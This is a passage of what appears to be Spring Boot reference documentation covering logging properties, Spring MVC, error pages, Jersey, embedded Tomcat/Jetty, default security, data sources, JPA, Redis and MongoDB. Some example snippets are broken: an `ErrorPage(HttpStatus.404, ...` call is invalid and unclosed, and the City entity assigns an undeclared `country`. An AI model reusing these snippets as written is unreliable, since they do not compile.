with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\nAll the logging systems supported can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\nWARNING: There are know classloading issues with Java Util Logging that cause problems\nwhen running from an '`executable jar`'. We recommend that you avoid it if at all\npossible.\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat or Jetty. Most web applications will\nuse the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n'<<getting-started.adoc#getting-started-first-application, Getting started>>' section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The '`Spring Web MVC framework`'\nThe Spring Web MVC framework (often referred to as simply '`Spring MVC`') is a rich\n'`model view controller`' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tList<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodeResolver` (see below)\n* Static `index.html` support.\n* Custom `Favicon` support.\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using the Jackson\nXML extension if available, else using JAXB).\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a folder called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nIn addition to the '`standard`' static resource locations above, a special case is made for\nhttp:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `+\/webjars\/**+` will\nbe served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` folder if your application will be packaged as a\njar. Although this folder is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\n\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/beta.groovy-lang.org\/docs\/groovy-2.3.0\/html\/documentation\/markup-template-engine.html[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n\nWhen you're using one of these templating engines with the default configuration, your\ntemplates will be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: JSPs should be avoided if possible, there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a\nsensible way, and it is registered as a '`global`' error page in the servlet container.\nFor machine clients it will produce a JSON response with details of the error, the HTTP\nstatus and the exception message. For browser clients there is a '`whitelabel`' error\nview that renders the same data in HTML format (to customize it just add a `View` that\nresolves to '`error`'). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean\nof type `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer(){\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like\n{spring-reference}\/#mvc-exceptionhandlers[`@ExceptionHandler` methods] and\n{spring-reference}\/#mvc-ann-controller-advice[`@ControllerAdvice`]. The `ErrorController`\nwill then pick up any unhandled exceptions.\n\nN.B. if you register an `ErrorPage` with a path that will end up being handled by a\n`Filter` (e.g. as is common with some non-Spring web frameworks, like Jersey and Wicket),\nthen the `Filter` has to be explicitly registered as an `ERROR` dispatcher, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilter() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setFilter(new MyFilter());\n\t\t...\n\t\tregistration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));\n\t\treturn registration;\n\t}\n----\n\n(the default `FilterRegistrationBean` does not include the `ERROR` dispatcher type).\n\n[[boot-features-error-handling-websphere]]\n===== Error Handling on WebSphere Application Server\nWhen deployed to a servlet container, a Spring Boot uses its error page filter to\nforward a request with an error status to the appropriate error page. The request can\nonly be forwarded to the correct error page if the response has not already been\ncommitted. By default, WebSphere Application Server 8.0 and later commits the response\nupon successful completion of a servlet's service method. You should disable this\nbehaviour by setting `com.ibm.ws.webcontainer.invokeFlushAfterService` to `false`\n\n\n\n[[boot-features-jersey]]\n=== JAX-RS and Jersey\nIf you prefer the JAX-RS programming model for REST endpoints you can use one of the\navailable implementations instead of Spring MVC. Jersey 1.x and Apache Celtix work\nquite well out of the box if you just register their `Servlet` or `Filter` as a\n`@Bean` in your application context. Jersey 2.x has some native Spring support so\nwe also provide autoconfiguration support for it in Spring Boot together with a\nstarter.\n\nTo get started with Jersey 2.x just include the `spring-boot-starter-jersey` as a\ndependency and then you need one `@Bean` of type `ResourceConfig` in which you register\nall the endpoints:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t}\n\t}\n----\n\nAll the registered endpoints should be `@Components` with HTTP resource annotations\n(`@GET` etc.), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\t@Path(\"\/hello\")\n\tpublic class Endpoint {\n\n\t\t@GET\n\t\tpublic String message() {\n\t\t\treturn \"Hello\";\n\t\t}\n\n\t}\n----\n\nSince the `Endpoint` is a Spring `@Component` its lifecycle is managed by Spring and you\ncan `@Autowired` dependencies and inject external configuration with `@Value`. The Jersey\nservlet will be registered and mapped to '`+\/*+`' by default. You can change the mapping\nby adding `@ApplicationPath` to your `ResourceConfig`.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey[Jersey sample] so\nyou can see how to set things up. There is also a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey1[Jersey 1.x sample].\nNote that in the Jersey 1.x sample that the spring-boot maven plugin has been configured to\nunpack some Jersey jars so they can be scanned by the JAX-RS implementation (the sample\nasks for them to be scanned in its `Filter` registration.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat and Jetty servers. Most developers will\nsimply use the appropriate '`Starter POM`' to obtain a fully configured instance. By\ndefault both Tomcat and Jetty will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-and-filters]]\n==== Servlets and Filters\nWhen using an embedded servlet container you can register Servlets and Filters directly as\nSpring beans. This can be particularly convenient if you want to refer to a value from\nyour `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In\nthe case of multiple Servlets beans the bean name will be used as a path prefix. Filters\nwill map to `+\/*+`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean` and `FilterRegistrationBean` classes for complete control. You\ncan also register items directly if your bean implements the `ServletContextInitializer`\ninterface.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded\nservlet container support. The `EmbeddedWebApplicationContext` is a special\ntype of `WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`\nor `JettyEmbeddedServletContainerFactory` will have been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.sessionTimeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embdedded servlet container programmatically you can register\na Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory` or `JettyEmbeddedServletContainerFactory` bean\nyourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.404, \"\/notfound.html\");\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n'`hooks`' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so\nyou can see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith '`basic`' authentication on all HTTP endpoints. To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user ('`user`' username and random\npassword, printed at INFO level when the application starts up)\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nYou can change the password by providing a `security.user.password`. This and other\nuseful properties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebConfigurerAdapter` (e.g. to\nadd form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`+\/css\/**+`, `+\/js\/**+`,\n `+\/images\/**+` and `+**\/favicon.ico+`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`+security.*+`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`+management.security.*+`). To override the application access rules\nadd a `@Bean` of type `WebConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.\n\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete '`object relational mapping`'\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The '`How-to`' section includes a '<<howto.adoc#howto-database-initialization, section\non how to initialize a database>>'\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't\nneed to provide any connection URLs, simply include a build dependency to the\nembedded database that you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling\n`DataSource`. Here's the algorithm for choosing a specific implementation.\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If HikariCP is available we will use it\n* If Commons DBCP is available we will use it, but we don't recommend it in production.\n* Lastly, if Commons DBCP2 is available we will use it\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n'`starter POMs`' you will automcatically get a dependency to `tomcat-jdbc`.\n\nNOTE: Additional connection pools can always be configured manually. If you define your\nown `DataSource` bean, auto-configuration will not occur.\n\nDataSource configuration is controlled by external configuration properties in\n`+spring.datasource.*+`. For example, you might declare the following section\nin `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options.\n\nTIP: You often won't need to specify the `driver-class-name` since Spring boot can deduce\nit for most databases from the `url`.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n\n\n[[boot-features-connecting-to-a-jndi-datasource]]\n==== Connection to a JNDI DataSource\nIf you are deploying your Spring Boot application to an Application Server you might want\nto configure and manage your DataSource using you Application Servers built in features\nand access it using JNDI.\n\nThe `spring.datasource.jndi-name` property can be used as an alternative to the\n`spring.datasource.url`, `spring.datasource.username` and `spring.datasource.password`\nproperties to access the `DataSource` from a specific JNDI location. For example, the\nfollowing section in `application.properties` shows how you can access a JBoss AS defined\n`DataSource`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.jndi-name=java:jboss\/datasources\/customers\n----\n\n\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and '`Spring Data`'\nThe Java Persistence API is a standard technology that allows you to '`map`' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to easily implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/['`Accessing Data with JPA`'] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA '`Entity`' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead '`Entity Scanning`' is used. By\ndefault all packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation.\nSee the '<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>'\nhow-to.\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities\nin a given state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces. If you are using\nauto-configuration, repositories will be searched from the package containing your\nmain configuration class (the one annotated with `@EnableAutoConfiguration`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default JPA database will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`+spring.jpa.*+` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `+spring.jpa.properties.*+` (the prefix is stripped before adding them\nto the entity manager). Example:\n\n[indent=0]\n----\n\tspring.jpa.properties.hibernate.globally_quoted_identifiers=true\n----\n\npasses `hibernate.globally_quoted_identifiers` to the Hibernate entity manager.\n\nBy default the DDL execution (or validation) is deferred until\nthe `ApplicationContext` has started. There is also a `spring.jpa.generate-ddl` flag, but\nit is not used if Hibernate autoconfig is active because the `ddl-auto`\nsettings are more fine grained.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nGemfire; you can make use of the other projects, but you will need to configure them\nyourself. Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the https:\/\/github.com\/xetorthio\/jedis\/[Jedis]\nclient library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There is a\n`spring-boot-starter-redis` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate` the exclusion is based on the bean name\n'`redisTemplate`' not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the The\n`spring-boot-starter-data-mongodb` '`Starter POM`'.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `com.mongodb.Mongo` instance as you would any other\nSpring Bean. By default the instance will attempt to connect to a MongoDB server using\nthe URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport com.mongodb.Mongo;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final Mongo mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(Mongo mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can set `spring.data.mongodb.uri` property to change the `url`, or alternatively\nspecify a `host`\/`port`. For example, you might declare the following in your\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nYou can also declare your own `Mongo` `@Bean` if you want to take complete control of\nestablishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a {spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`]\nclass that is very similar in its design to Spring's `JdbcTemplate`. As with\n`JdbcTemplate` Spring Boot auto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = 